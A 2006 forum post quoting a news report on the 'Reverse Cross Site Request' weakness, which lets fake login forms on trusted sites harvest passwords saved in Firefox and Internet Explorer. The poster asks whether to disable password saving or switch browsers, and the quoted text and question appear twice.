infoseeker
November 26th, 2006, 12:16 AM
Frequent visitors to blogs and Internet forums may be particularly at risk of identity theft due to an exploit that prompts the Firefox and Internet Explorer password managers to give away their protected information. Both Mozilla and Microsoft have acknowledged the problem and are working on fixes.
A software security researcher has warned that the password manager features of Mozilla's open source Firefox 2.0 and Microsoft's (Nasdaq: MSFT) Internet Explorer (IE) Web browsers could be exploited, placing unsuspecting users at risk.
Users of Firefox or Explorer, both of which may be vulnerable to the attack known as "Reverse Cross Site Request" (RCSR), are not fooled directly by the password theft exploit. Instead, it provides a fake login site that fools a browser's saved password feature into automatically providing the information, Robert Chapin, president of Chapin Information Services, reported.
Neither the latest Firefox 2.0 nor Explorer 7 browser were designed to check the destination of form data before submission, thus making them vulnerable to the weakness.
Because the exploit is actually conducted at a trusted Web site, the user sees a trusted address in the browser bar, according to Chapin.
"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum Web sites at trusted addresses," Chapin wrote for his security site Chapin Information Services (CIS).
http://www.technewsworld.com/story/QH9bSetNcAdCEL/Firefox-IE-Vulnerable-to-Password-Theft.xhtml
do i say "Dont Remember My Password" and "am i using OPERa or other browser?"
A software security researcher has warned that the password manager features of Mozilla's open source Firefox 2.0 and Microsoft's (Nasdaq: MSFT) Internet Explorer (IE) Web browsers could be exploited, placing unsuspecting users at risk.
Users of Firefox or Explorer, both of which may be vulnerable to the attack known as "Reverse Cross Site Request" (RCSR), are not fooled directly by the password theft exploit. Instead, it provides a fake login site that fools a browser's saved password feature into automatically providing the information, Robert Chapin, president of Chapin Information Services, reported.
Neither the latest Firefox 2.0 nor Explorer 7 browser were designed to check the destination of form data before submission, thus making them vulnerable to the weakness.
Because the exploit is actually conducted at a trusted Web site, the user sees a trusted address in the browser bar, according to Chapin.
"Users of both Firefox and Internet Explorer need to be aware that their information can be stolen in this way when visiting blog and forum Web sites at trusted addresses," Chapin wrote for his security site Chapin Information Services (CIS).
http://www.technewsworld.com/story/QH9bSetNcAdCEL/Firefox-IE-Vulnerable-to-Password-Theft.xhtml
do i say "Dont Remember My Password" and "am i using OPERa or other browser?"